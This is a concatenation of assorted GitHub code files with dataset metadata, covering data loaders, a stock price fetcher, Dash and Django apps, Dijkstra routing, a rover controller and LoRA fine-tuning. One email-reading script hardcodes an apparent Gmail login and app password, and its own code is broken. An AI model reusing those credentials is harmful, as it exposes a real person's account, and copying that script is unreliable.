replacement=True\r\n )\r\n return balanced_sampler\r\n\r\n\r\ntrain_data_sampler = classes(train_dataset)\r\ntest_data_sampler = classes(test_dataset)\r\n\r\nsampler_train = sampler(train_data_sampler[0],train_data_sampler[1],train_data_sampler[2]) \r\nsampler_test = sampler(test_data_sampler[0],test_data_sampler[1],test_data_sampler[2])\r\n\r\n\r\nbatch_size = 64\r\ntrain_loader = DataLoader(dataset=train_dataset, batch_size=batch_size,sampler=sampler_train)\r\ntest_loader = DataLoader(dataset=test_dataset, batch_size=batch_size,sampler = sampler_test)\r\nprint(len(train_dataset))\r\nprint(len(test_dataset))\r\n\r\n# /Users/rinusvangrunsven/Documents/GitHub/DSPA2/dataset/train_data\r\n","repo_name":"sofiamluisa/DSPA2","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74348685011","text":"\"\"\"A source fetching prices and exchangerates from https://www.alphavantage.co.\n\nIt requires a free api key which needs to be set in the\nenvironment variable \"ALPHAVANTAGE_API_KEY\"\n\nValid tickers for prices are in the form \"price:XXX:YYY\", such as \"price:IBM:USD\"\nwhere XXX is the symbol and YYY is the expected quote currency in which the data\nis returned. The api currently does not support converting to a specific ccy and\ndoes unfortunately not return in which ccy the result is.\n\nValid tickers for exchangerates are in the form \"fx:XXX:YYY\", such as \"fx:USD:CHF\".\n\nHere is the API documentation:\nhttps://www.alphavantage.co/documentation/\n\nFor example:\n\n\nhttps://www.alphavantage.co/query?function=GLOBAL_QUOTE&symbol=IBM&apikey=demo\n\nhttps://www.alphavantage.co/query?function=CURRENCY_EXCHANGE_RATE&from_currency=USD&to_currency=JPY&apikey=demo\n\n\"\"\"\n\nfrom decimal import Decimal\n\nimport re\nfrom os import environ\nfrom time import sleep\nimport requests\nfrom dateutil.tz import tz\nfrom dateutil.parser import parse\n\nfrom beanprice import source\n\n\nclass AlphavantageApiError(ValueError):\n \"An error from the Alphavantage API.\"\n\ndef _parse_ticker(ticker):\n \"\"\"Parse the base and quote currencies from the ticker.\n\n Args:\n ticker: A string, the symbol in kind-XXX-YYY format.\n Returns:\n A (kind, symbol, base) tuple.\n \"\"\"\n match = re.match(r'^(?Pprice|fx):(?P[^:]+):(?P\\w+)$', ticker)\n if not match:\n raise ValueError(\n 'Invalid ticker. Use \"price:SYMBOL:BASE\" or \"fx:CCY:BASE\" format.')\n return match.groups()\n\ndef _do_fetch(params):\n params['apikey'] = environ['ALPHAVANTAGE_API_KEY']\n\n resp = requests.get(url='https://www.alphavantage.co/query', params=params)\n data = resp.json()\n # This is for dealing with the rate limit, sleep for 60 seconds and then retry\n if 'Note' in data:\n sleep(60)\n resp = requests.get(url='https://www.alphavantage.co/query', params=params)\n data = resp.json()\n\n if resp.status_code != requests.codes.ok:\n raise AlphavantageApiError(\"Invalid response ({}): {}\".format(resp.status_code,\n resp.text))\n\n if 'Error Message' in data:\n raise AlphavantageApiError(\"Invalid response: {}\".format(data['Error Message']))\n\n return data\n\n\nclass Source(source.Source):\n\n def get_latest_price(self, ticker):\n kind, symbol, base = _parse_ticker(ticker)\n\n if kind == 'price':\n params = {\n 'function': 'GLOBAL_QUOTE',\n 'symbol': symbol,\n }\n data = _do_fetch(params)\n\n price_data = data['Global Quote']\n price = Decimal(price_data['05. price'])\n date = parse(price_data['07. latest trading day']).replace(tzinfo=tz.tzutc())\n else:\n params = {\n 'function': 'CURRENCY_EXCHANGE_RATE',\n 'from_currency': symbol,\n 'to_currency': base,\n }\n data = _do_fetch(params)\n\n price_data = data['Realtime Currency Exchange Rate']\n price = Decimal(price_data['5. Exchange Rate'])\n date = parse(price_data['6. Last Refreshed']).replace(\n tzinfo=tz.gettz(price_data['7. Time Zone']))\n\n return source.SourcePrice(price, date, base)\n\n def get_historical_price(self, ticker, time):\n return None\n","repo_name":"beancount/beanprice","sub_path":"beanprice/sources/alphavantage.py","file_name":"alphavantage.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"66"} +{"seq_id":"42428798713","text":"from dash import html, callback, Input, Output, dash_table\r\nfrom dash.dependencies import Input, Output, State\r\nimport time\r\nimport pandas as pd\r\nimport pathlib\r\nimport numpy as np\r\nimport dash_bootstrap_components as dbc\r\n\r\n# get relative data folder\r\nPATH = pathlib.Path(__file__).parent\r\n\r\nlayout = html.Div(children=[\r\n html.H1(children='Analytics', className=\"content\"),\r\n html.Button(\"Check for Missing and Duplicated Values\", id=\"button_2\"),\r\n html.Div(id='output-data-upload2'),\r\n html.Div(id='output-data-upload3'),\r\n])\r\n\r\n\r\n# Checks the percentage of missing/duplicated data within the dataset\r\ndef check_unique(content):\r\n df = pd.read_json(content, orient='split')\r\n output = []\r\n try:\r\n features_with_na = [features for features in df if df[features].isnull().sum() > 0]\r\n features_without_na = [features for features in df if df[features].isnull().sum() == 0]\r\n S1 = html.H6(\"This is the Percentage for missing data:\")\r\n output.append(S1)\r\n output.append(f\"{features_without_na} do not have missing data\")\r\n for feature in features_with_na:\r\n output.append(f\"{feature}:\")\r\n output.append(f\"{np.round(df[feature].isnull().mean(), 4) * 100}%\")\r\n features_with_dup = [features for features in df if df[features].duplicated().sum()]\r\n features_without_dup = [features for features in df if df[features].duplicated().sum() == 0]\r\n S2 = html.H6(\"This is the Percentage for duplicated data:\")\r\n output.append(S2)\r\n output.append(f\"{features_without_dup} do not have duplicated data\")\r\n for feature in features_with_dup:\r\n output.append(f\"{feature}:\")\r\n output.append(f\"{(np.round(df[feature].duplicated().mean(), 4) * 100)}%\")\r\n except Exception as e:\r\n print(e)\r\n return html.Div([\r\n html.H5(\"There was an error processing this file.\", className='analytics')\r\n ])\r\n return html.Div([\r\n html.Div([html.P(msg) for msg in output]),\r\n html.Hr(), # horizontal line\r\n ])\r\n\r\n\r\ndef remove_unique(content):\r\n content.dropna(inplace=True)\r\n content.drop_duplicates(inplace=True)\r\n\r\n return html.Div([\r\n dash_table.DataTable(\r\n content.to_dict('records'),\r\n [{'name': i, 'id': i} for i in content.columns],\r\n page_size=10\r\n ),\r\n\r\n html.Hr(), # horizontal line\r\n ])\r\n\r\n\r\n@callback(Output('output-data-upload2', 'children'),\r\n State('store', 'data'),\r\n Input(\"button_2\", \"n_clicks\"), prevent_initial_call=True)\r\ndef update_output2(stored_data, n):\r\n time.sleep(2)\r\n children = [\r\n check_unique(stored_data),\r\n html.Button(\"Remove Missing/Duplicated Values\", id=\"button_3\")]\r\n return children\r\n\r\n\r\n@callback(Output('output-data-upload3', 'children'),\r\n Output('store', 'data', allow_duplicate=True),\r\n State('store', 'data'),\r\n Input(\"button_3\", \"n_clicks\"), prevent_initial_call=True)\r\ndef update_output3(stored_data, n):\r\n df = pd.read_json(stored_data, orient='split')\r\n time.sleep(2)\r\n children = [\r\n remove_unique(df),\r\n # Next button, links to consistency page\r\n dbc.Button(\"Check Consistency\", href=\"http://localhost:8050/apps/consistency\", outline=True, color=\"danger\",\r\n id=\"dbc_button\")]\r\n return children, df.to_json(date_format='iso', orient='split')\r\n","repo_name":"CWilson2001/FinalYear","sub_path":"apps/missing_duplicated.py","file_name":"missing_duplicated.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27309742556","text":"from django.urls import path\nfrom .views import (\n QuizListView,\n quiz_view,\n quiz_data_view,\n save_quiz_view,\n over,\n redirect,\n new_data,\n # get_image\n \n)\n\napp_name = 'quizes'\n\nurlpatterns = [\n path('', QuizListView, name='main-view'),\n path(f'/', quiz_view, name='quiz-view'),\n path(f'/save/', save_quiz_view, name='save-view'),\n path(f'/data/', quiz_data_view, name='quiz-data-view'),\n path(f'sign-up/',over,name='sign-up'),\n path(f'redirect/',redirect,name='redirect'),\n path(f'file_data/',new_data,name='file_data'),\n # path('image/',get_image,name='image')\n # path(f'quiz/',quiz_automate)\n]\n","repo_name":"Boluex/Django_quiz_whatsapp_project","sub_path":"quizes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74337284370","text":"class ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\ndef _print(n) :\n print('[',end=' ')\n while n != None :\n print('{},'.format(n.val),end='')\n n = n.next\n print(']')\n\ndef sol (head) :\n # _print(head)\n cur = head\n while cur != None and cur.next != None :\n if cur.val == cur.next.val :\n cur.next = cur.next.next\n cur = head\n else :\n cur = cur.next\n return head\n\n\nif __name__ == \"__main__\" :\n # [1,1,2] \n l = list(map(int,input().strip('[]').split(',')))\n dummy = ListNode()\n cur = dummy\n for i in l :\n new = ListNode(i)\n cur.next = new\n cur = cur.next\n # _print(dummy)\n _print(sol(dummy.next))","repo_name":"GoldF15h/LeetCode","sub_path":"83. Remove Duplicates from Sorted List.py","file_name":"83. Remove Duplicates from Sorted List.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4116659320","text":"import random\nfrom time import sleep\nimport platform\nfrom sys import stdout\nfrom threading import Thread, Lock\nfrom exec_proc import ExecProc\nfrom metric_thread import MetricThread\nimport logging\n\nclass Dispatcher:\n \n def __init__(self):\n pass\n \n def setConfig(self,config):\n self.config = config\n \n def printMetric(self,metric):\n print(metric + \" \" + str(random.randrange(0,99)) + \" \" + platform.node())\n \n def printOutput(self):\n self.printMetric(\"LOAD_1_MINUTE\")\n self.printMetric(\"LOAD_5_MINUTE\")\n self.printMetric(\"LOAD_15_MINUTE\")\n \n def run(self):\n stdoutmutex = Lock() # same as thread.allocate_lock()\n threads = []\n items = self.config.getItems()\n for i in items:\n# print(i.getName())\n thread = MetricThread(i,stdoutmutex) # make/ start 10 threads\n thread.start() # starts run method in a thread\n threads.append(thread)\n for thread in threads:\n thread.join() # wait for thread exits\n \n def execute(self,executeProcess,inputs):\n pool = Pool(processes=len(inputs))\n print(type(executeProcess))\n print(type(inputs))\n print(type(len(inputs)))\n results = pool.map(executeProcess,inputs)\n pool.close()\n return all(results)\n","repo_name":"boundary/boundary-plugin-shell","sub_path":"dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38205964151","text":"import math\n\ncoords = [\n (21.033333, 105.850000),\n (21.027763, 105.834160),\n (21.021602, 105.818118),\n (21.036386, 105.805088),\n (21.039070, 105.793105),\n (21.052364, 105.796972),\n (21.064834, 105.794064)\n]\n\ndef taoDoThiCoHuong():\n f = open('doThiCoHuong.txt')\n soLuongDinh = int(f.readline().strip())\n cacDong = f.readlines()\n f.close()\n\n doThi = [[0 for _ in range(soLuongDinh)] for _ in range(soLuongDinh)]\n for dong in cacDong:\n dsGiaTri = dong.split()\n if len(dsGiaTri) != 3:\n continue\n else:\n dong = int(dsGiaTri[0])\n cot = int(dsGiaTri[1])\n khoangCach = int(dsGiaTri[2])\n doThi[dong][cot] = khoangCach\n #endIf\n #endFor\n return doThi\n#endDef\n\ndsDinhDiQua = 0\n\ndef layDuongDi(dsDinhtruoc, dinhDich):\n global dsDinhDiQua\n dsDinhDiQua = [dinhDich]\n dinh = dinhDich\n while True:\n dinh = dsDinhtruoc[dinh]\n if dinh == None:\n break\n else:\n dsDinhDiQua.insert(0,dinh)\n #endif\n #endWhile\n dsDinhDiQuaString = [str(x) for x in dsDinhDiQua]\n return ' -> '.join(dsDinhDiQuaString)\n#endDef\n\ndef khoangCachMin(dsKhoangCach, dsDinhCayMin):\n nhoNhat = math.inf\n dinhNhoNhat = math.inf\n for dinh in range(len(dsKhoangCach)):\n if dsDinhCayMin[dinh] == False and dsKhoangCach[dinh] < nhoNhat:\n nhoNhat = dsKhoangCach[dinh]\n dinhNhoNhat = dinh\n #endIf\n #endFor\n return dinhNhoNhat\n#endDef\n\ndef dijkstra(doThi, dinhNguon, dinhDich):\n soLuongDinh = len(doThi)\n #Khoang Cach toi cac dinh la vo cung\n dsKhoanhCach = [math.inf for _ in range(soLuongDinh)]\n #Khoang cach tu dinh nguon toi chinh no = 0\n dsKhoanhCach[dinhNguon] = 0\n dsDinhTruoc = [None for _ in range(soLuongDinh)]\n dsDinhCayMin = [False for _ in range(soLuongDinh)]\n\n for i in range(soLuongDinh):\n x = khoangCachMin(dsKhoanhCach, dsDinhCayMin)\n\n if x == math.inf:\n print(f'Khong co duong di dinh {dinhNguon} den dinh {dinhDich}')\n return\n #endIf\n\n dsDinhCayMin[x] = True\n if x == dinhDich:\n print(f'Tim thay duong di tu dinh {dinhNguon} den dinh {dinhDich}')\n duongDi = layDuongDi(dsDinhTruoc, dinhDich)\n thongBao = f'Tu dinh {dinhNguon} den dinh {dinhDich} : ' \\\n + duongDi + ' : ' + str(dsKhoanhCach[dinhDich])\n print(thongBao)\n return\n else:\n for y in range(soLuongDinh):\n if dsDinhCayMin[y] == False \\\n and doThi[x][y] > 0 and dsKhoanhCach[y] > dsKhoanhCach[x] + doThi[x][y]:\n dsKhoanhCach[y] = dsKhoanhCach[x] + doThi[x][y]\n dsDinhTruoc[y] = x\n #endIf\n #endFor\n #endIf\n #endFor\n#endDef\n\nhello = [[0 for _ in range(len(coords))] for _ in range(len(coords))]\nprint(hello)\n\n\n# doThi = taoDoThiCoHuong()\n# print(doThi) \n# soLuongDinh = len(doThi)\n# print('So Luong Dinh', soLuongDinh)\n# dinhNguon = int(input('Nhap vao dinh nguon: '))\n# dinhDich = int(input('Nhap vao dinh dich: '))\n# if dinhNguon in range(soLuongDinh) and dinhDich in range(soLuongDinh):\n# dijkstra(doThi, dinhNguon, dinhDich)\n# print(dsDinhDiQua)\n\n#endIf\n\n# # Driver code\n\n\n# def create_graph(coords):\n# graph = {}\n# for i in range(len(coords)):\n# graph[i] = {}\n# for j in range(len(coords)):\n# if i != j:\n# dist = haversine(coords[i][0], coords[i][1], coords[j][0], coords[j][1])\n# graph[i][j] = dist\n# return graph\n\n# def dijkstra(start, end, graph):\n# # Khởi tạo khoảng cách ban đầu\n# distances = {vertex: float('infinity') for vertex in graph}\n# distances[start] = 0\n\n# # Sử dụng heap để lưu trữ đỉnh và khoảng cách\n# pq = [(0, start)]\n# previous_vertices = {vertex: None for vertex in graph}\n\n# while len(pq) > 0:\n# current_distance, current_vertex = heapq.heappop(pq)\n\n# # Nếu đỉnh hiện tại là đỉnh đích, kết thúc thuật toán\n# if current_vertex == end:\n# path = []\n# while current_vertex is not None:\n# path.append(current_vertex)\n# current_vertex = previous_vertices[current_vertex]\n\n# return path[::-1]\n\n# # Nếu không, cập nhật khoảng cách đến các đỉnh kề\n# for neighbor, weight in graph[current_vertex].items():\n# distance = distances[current_vertex] + weight\n\n# # Nếu khoảng cách mới nhỏ hơn khoảng cách hiện tại, cập nhật\n# if distance < distances[neighbor]:\n# distances[neighbor] = distance\n# previous_vertices[neighbor] = current_vertex\n# heapq.heappush(pq, (distance, neighbor))\n\n# return None\n\n# # Ví dụ về cách sử dụng thuật toán\n# coords = [\n# (21.033333, 105.850000),\n# (21.027763, 105.834160),\n# (21.021602, 105.818118),\n# (21.036386, 105.805088),\n# (21.039070, 105.793105),\n# (21.052364, 105.796972),\n# (21.064834, 105.794064)\n# ]\n# print(len(coords))\n# graph = create_graph(coords)\n# print(graph)\n# start = 0\n# end = 6\n\n# path = dijkstra(start, end, graph)\n# print(path)\n# if path is not None:\n# for i in range(len(path) - 1):\n# print(f\"Di chuyển từ {coords[path[i]]} đến {coords[path[i+1]]}\")\n# else:\n# print(f\"Không tìm thấy đường đi từ {start} đến {end}\")\n\n\n","repo_name":"Shikamoto/Luan_Van_Push","sub_path":"main_1.py","file_name":"main_1.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33631003072","text":"import asyncio\nimport grpc\nimport logging\nimport pytest\n\nlogger = logging.getLogger(__name__)\n\n\nMAPPINGS_GRPC_ADDRESS = 'localhost:12033'\n\n\n@pytest.fixture()\nasync def grpc_mappings_channel(taxi_market_fast_mappings_reader):\n async with grpc.aio.insecure_channel(MAPPINGS_GRPC_ADDRESS) as channel:\n logger.info('gRPC channel opened')\n\n done, _ = await asyncio.wait(\n [channel.channel_ready()],\n return_when=asyncio.FIRST_COMPLETED,\n timeout=15,\n )\n\n if not done:\n raise Exception(\n f'Failed to connect to remote gRPC server by '\n f'address {MAPPINGS_GRPC_ADDRESS}',\n )\n\n logger.info('gRPC channel ready')\n\n yield channel\n logger.info('gRPC channel closed')\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_market_fast_mappings_reader/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41537679723","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sympy as sp\r\n\r\ndef graphing_rational(expr, x_vals):\r\n x = sp.Symbol('x')\r\n f_expr = sp.lambdify(x, expr, 'numpy')\r\n y_vals = f_expr(x_vals)\r\n\r\n plt.plot(x_vals, y_vals, label='f(x)')\r\n plt.xlabel('x')\r\n plt.ylabel('f(x)')\r\n plt.grid(True)\r\n plt.legend()\r\n plt.title('Rational Function')\r\n\r\n plt.show()\r\n\r\n# 평행이동한 무리함수 표현\r\nx = sp.Symbol('x')\r\na = 2 # 계수\r\nexpr = sp.sqrt(a * x) / (x**2 + 1) + 5 # 평행이동한 식\r\n\r\n# x 범위 설정\r\nx_vals = np.linspace(0, 10, 400)\r\n\r\n# 그래프 출력\r\ngraphing_rational(expr, x_vals)\r\n","repo_name":"ghfkdgo/laughing-parakeet","sub_path":"calculus_final/TEST_무리함수/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41691964671","text":"# -*- coding: utf-8 -*-\nfrom helper import *\nimport time\n\n\nclass Stop(object):\n def __init__(self, rover, brake=5):\n self.rover = rover\n self.brake = brake\n self.rover.steer = 0\n self.start_time = self.rover.total_time\n\n def __str__(self):\n return 'Stop'\n\n def delay(self, sec):\n if self.start_time == 0:\n self.start_time = self.rover.total_time\n delta = self.rover.total_time - self.start_time\n if delta <= sec:\n return False\n else:\n self.start_time = 0\n return True\n\n def run(self):\n self.rover.brake = self.brake\n self.rover.throttle = 0.0\n self.rover.steer = 0\n\n def next(self):\n self.rover.throttle = 0.0\n self.rover.steer = 0\n if abs(self.rover.vel) < 0.02:\n if self.delay(0.5):\n self.rover.brake = 0.0\n if self.rover.go_home:\n return ReturnHome(self.rover)\n else:\n return SearchClearPath(self.rover)\n else:\n return self\n else:\n return self\n\n\nclass Go(object):\n def __init__(self, rover, throttle=0.1):\n self.rover = rover\n self.throttle = throttle\n self.bearing = 0\n self.nav_data = None\n self.front_area = 0\n self.start_time = 0\n\n def __str__(self):\n return 'Go'\n\n def delay(self, sec):\n if self.start_time == 0:\n self.start_time = self.rover.total_time\n delta = self.rover.total_time - self.start_time\n if delta <= sec:\n # print 'stabilizing...', delta\n return False\n else:\n self.start_time = 0\n return True\n\n def run(self):\n self.rover.brake = 0\n self.rover.throttle = self.throttle\n\n def update_sterring(self):\n self.nav_data = get_polar_points(self.rover)\n mean_dir = rad2deg(np.mean(get_near_periferics(self.nav_data, 100)))\n desv = rad2deg(np.sqrt(get_near_periferics(self.nav_data, 100).var()))\n AI, AD = side_areas(self.rover)\n if AI > 0.48:\n self.bearing = np.int_(mean_dir)\n self.rover.steer = np.clip(self.bearing, -15, 15)\n elif AI > 0.25:\n self.bearing = np.int_(mean_dir + 0.8 * desv)\n self.rover.steer = np.clip(self.bearing, -2, 15)\n elif AI < 0.20:\n self.bearing = np.int_(mean_dir + 0.5 * desv)\n self.rover.steer = np.clip(self.bearing, -12, 12)\n else:\n self.bearing = 0\n self.rover.steer = self.bearing\n\n def check_area_stop(self):\n if len(self.rover.nav_angles) > self.rover.stop_forward:\n return True\n else:\n return False\n\n def check_vel_max(self):\n if self.rover.vel >= self.rover.max_vel:\n self.rover.throttle = 0.0\n else:\n self.rover.throttle = self.rover.throttle_set\n\n def stuck(self):\n if self.rover.vel < 0.02:\n if self.delay(0.3):\n if self.rover.throttle > 0:\n return True\n else:\n return False\n return False\n else:\n return False\n\n def check_rock_sight(self):\n if distance_to_rock(self.rover) > 0:\n return True\n else:\n return False\n\n def next(self):\n print('area: ', len(self.rover.nav_angles))\n print('fron area:', self.front_area)\n if self.check_rock_sight():\n self.rover.rock_detected = True\n return Stop(self.rover, brake=2)\n if self.check_area_stop(): # and is_obstacle_ahead(self.rover) ==\n self.check_vel_max()\n self.update_sterring()\n self.front_area = is_obstacle_ahead(\n self.rover, range=20, bearing=self.bearing)\n if self.front_area > 100:\n print('fron area:', self.front_area)\n return Stop(self.rover)\n if self.stuck():\n return Stuck(self.rover)\n else:\n return self\n else:\n return Stop(self.rover)\n\n\nclass SearchClearPath(object):\n def __init__(self, rover, turn='right'):\n self.rover = rover\n self.turn_direction = turn\n self.iteration = 0\n\n def __str__(self):\n return 'SearchClearPath'\n\n def run(self):\n self.rover.brake = 0.0\n\n def update_turn(self):\n if self.turn_direction is 'right':\n self.rover.steer = -15\n elif self.turn_direction is 'left':\n self.rover.steer = 15\n self.iteration += 1\n\n def toogle_turn(self):\n if self.turn_direction is 'right':\n self.turn_direction = 'left'\n elif self.turn_direction is 'left':\n self.turn_direction = 'right'\n\n def next(self):\n self.update_turn()\n AI, AD = side_areas(self.rover)\n print('iter: ', self.iteration)\n print('area: ', len(self.rover.nav_angles))\n print('AI:', AI)\n if self.rover.rock_detected:\n return Rock(self.rover)\n else:\n if len(self.rover.nav_angles) >= self.rover.go_forward:\n if is_obstacle_ahead(self.rover, 25, 0, arc=15) > 40:\n return self\n else:\n if AI < 0.48:\n return self\n else:\n self.iteration = 0\n self.rover.steer = 0\n return Go(self.rover)\n # elif self.iteration < 100:\n # return self\n elif self.iteration == 500:\n # raw_input()\n # self.iteration += 1\n self.toogle_turn()\n return self\n elif self.iteration >= 1000:\n # raw_input()\n # self.iteration += 1\n # if self.iteration >= 200:\n # raw_input()\n self.iteration = 0\n return Go(self.rover)\n # else:\n # return self\n else:\n # self.iteration +=1\n return self\n\n\nclass Stuck(object):\n def __init__(self, rover):\n self.rover = rover\n self.times = 0\n\n def __str__(self):\n return 'Stuck'\n\n def check_vel_max(self):\n if self.rover.vel < -self.rover.max_vel:\n return False\n else:\n return True\n\n def run(self):\n self.rover.steer = 0\n self.rover.throttle = 0\n\n def next(self):\n if self.rover.picking_up:\n return Stop(self.rover)\n self.times += 1\n if self.times >= 1:\n if self.times >= 35:\n self.rover.throttle = 0.0\n self.times = 0\n return Stop(self.rover)\n else:\n if self.check_vel_max():\n self.rover.throttle = -0.1\n else:\n self.rover.throttle = 0\n return self\n return self\n\n\nclass Rock(Go):\n def __init__(self, rover):\n self.rover = rover\n self.distance = 0\n self.angle = 0\n self.iteration = 0\n self.bearing = 0\n self.start_time = 0\n\n def __str__(self):\n return 'Rock'\n\n def update_rock_data(self):\n self.distance = distance_to_rock(self.rover)\n if self.distance != 0:\n self.angle = rad2deg(np.mean(self.rover.rock_angles))\n\n def check(self):\n # If in a state where want to pickup a rock send pickup command\n if self.rover.near_sample:\n self.rover.throttle = 0\n self.rover.brake = self.rover.brake_set\n if self.rover.vel == 0 and not self.rover.picking_up:\n self.rover.send_pickup = True\n while self.rover.picking_up:\n print('picking up')\n self.rover.rock_detected = False\n self.rover.max_vel = 1\n return True\n else:\n self.rover.brake = self.rover.brake_set\n return False\n else:\n return False\n\n def putting_rock_infront(self):\n if abs(self.angle) > 25:\n self.bearing = self.angle\n self.rover.steer = np.clip(self.bearing, -15, 15, out=None)\n else:\n self.rover.steer = 0\n\n def go(self):\n if self.rover.vel > self.rover.max_vel:\n self.rover.throttle = 0\n else:\n self.rover.throttle = 0.1\n\n def run(self):\n # self.delay(100)\n self.rover.max_vel = 0.5\n self.update_rock_data()\n # self.putting_rock_infront()\n # self.first_angle = self.angle\n\n def next(self):\n self.update_rock_data()\n if self.distance == 0:\n self.iteration += 1\n self.rover.steer = np.clip(self.bearing, -15, 15)\n self.go()\n if self.iteration >= 5:\n self.rover.max_vel = 1\n self.rover.rock_detected = False\n self.iteration = 0\n return Go(self.rover, throttle=0.1)\n else:\n return self\n else:\n self.iteration = 0\n print('distance:', self.distance)\n print('angle: ', self.angle)\n self.go()\n self.putting_rock_infront()\n if self.check():\n if self.rover.samples_to_find == 0:\n return s(self.rover)\n else:\n if np.sign(self.bearing):\n turn = 'right'\n else:\n turn = 'left'\n return SearchClearPath(self.rover, turn)\n else:\n if self.stuck():\n self.putting_rock_infront()\n return Stuck(self.rover)\n else:\n return self\n\n\nclass ReturnHome(Go):\n def __init__(self, rover):\n self.rover = rover\n self.home = self.rover.pos\n self.front_area = 0\n\n def __str__(self):\n return 'ReturnHome'\n\n def bearing_to_home_position(self):\n x = self.rover.pos[0] - self.home[0]\n y = self.rover.pos[1] - self.home[1]\n bearing = rad2deg(np.arctan2(y, x))\n return bearing\n\n def update_sterring(self):\n min_nav_angle = rad2deg(np.min(self.rover.nav_angles)) + 45\n max_nav_angle = rad2deg(np.max(self.rover.nav_angles)) - 45\n min_obs_angle = rad2deg(np.min(self.rover.nav_angles)) + 45\n max_obs_angle = rad2deg(np.max(self.rover.nav_angles)) - 45\n\n min_angle = max(min_nav_angle, min_obs_angle)\n max_angle = min(max_nav_angle, max_obs_angle)\n\n self.rover.steer = np.clip(self.bearing_to_home_position(),\n min_angle, max_angle)\n self.front_area = is_obstacle_ahead(\n self.rover, range=30, bearing=self.bearing_to_home_position())\n\n def run(self):\n pass\n\n def next(self):\n if self.rover.samples_to_find == 0:\n self.rover.go_home = True\n print('area: ', len(self.rover.nav_angles))\n print('front area:', self.front_area)\n if self.check_area_stop(): # and is_obstacle_ahead(self.rover) ==\n self.update_sterring()\n self.check_vel_max()\n if self.front_area > 150:\n return Stop(self.rover)\n if self.stuck():\n return Stuck(self.rover)\n else:\n return self\n else:\n return Stop(self.rover)\n else:\n return Go(self.rover, throttle=0.1)\n","repo_name":"juancruzgassoloncan/Udacity-Robo-nanodegree","sub_path":"src/rover/project/code/rover_sates.py","file_name":"rover_sates.py","file_ext":"py","file_size_in_byte":11792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"30103498399","text":"import datetime\r\nx = datetime.datetime.now() - datetime.timedelta(1) #yesterday date\r\nyesterday = x.strftime(\"%d\")+\"-\"+x.strftime(\"%B\")+\"-\"+x.strftime(\"%Y\") #yesterday date, nicely formated\r\n\r\n#SMTP --> sending emails (to server)\r\n#IMAP (and pop3) --> receiving emails (from server)\r\n#pop3 = move emails from server to client\r\n#imap = copy emails from server to client\r\n\r\nimport imapclient\r\nconn = imapclient.IMAPClient('imap.gmail.com' , ssl=True)\r\nconn.login('nimaahmadvand28@gmail.com' , 'xskpizckmmcuhswv')\r\nconn.select_folder('INBOX' , readonly=True)\r\n#UIDs = conn.search([\"SINCE \"+yesterday])\r\n#UIDs = conn.search(['NOT DELETED'])\r\nUIDs = conn.search(['FROM', 'support@mega.nz'])\r\nprint (UIDs)\r\nUID = input (\"select one: \")\r\nrawMessage = conn.fetch([UID] , ['BODY[]' , 'FLAGS'])\r\n\r\nf = open('mail.html','w')\r\nf.write(rawMessage)\r\nf.close()\r\nwebbrowser.open_new_tab(str(mail.html))\r\n\r\n#import pyzmail #easy_install pyzmail\r\n#message = pyzmail.PyzMessage.factory(rawMessage[UID][b'BODY[]'])\r\n#print (message#)","repo_name":"nimaahmadvand/python","sub_path":"receiving-emails.py","file_name":"receiving-emails.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"532879926","text":"#Load the FLAN-T5-XL model\n\nimport os\nimport torch\nimport torch.nn as nn\nfrom datasets import load_dataset\nfrom transformers import AutoModelForSeq2SeqLM, AutoTokenizer\nmodel_name = \"google/flan-t5-xl\"\nmodel = AutoModelForSeq2SeqLM.from_pretrained(model_name, load_in_8bit=True)\ntokenizer = AutoTokenizer.from_pretrained(model_name)\n\n#prepare the model for 8-bit training\n\nfrom peft import prepare_model_for_int8_training\nmodel = prepare_model_for_int8_training(model)\n\n# load the model for the training\n\nfrom peft import LoraConfig, get_peft_model, TaskType\n\n\ndef print_trainable_parameters(model):\n \"\"\"\n Prints the number of trainable parameters in the model.\n \"\"\"\n trainable_params = 0\n all_param = 0\n for _, param in model.named_parameters():\n all_param += param.numel()\n if param.requires_grad:\n trainable_params += param.numel()\n print(\n f\"trainable params: {trainable_params} || all params: {all_param} || trainable%: {100 * trainable_params / all_param}\"\n )\n\n\nlora_config = LoraConfig(\n r=16, lora_alpha=32, target_modules=[\"q\", \"v\"], lora_dropout=0.05, bias=\"none\", task_type=\"SEQ_2_SEQ_LM\"\n)\n\nmodel = get_peft_model(model, lora_config)\nmodel = nn.DataParallel(model,device_ids = [0,1,2])\nprint_trainable_parameters(model)\n\n#Load the dataset and pre-process\n\ndataset_id = \"Pretam/hi-kn\" ##\"cnn_dailymail\" # Hugging Face Dataset Id\ndataset_config = \"3.0.0\" # config/verison of the dataset\n#save_dataset_path = sys.argv[2] # local path to save processed dataset\ntext_column = \"source\" # column of input text is\nsummary_column = 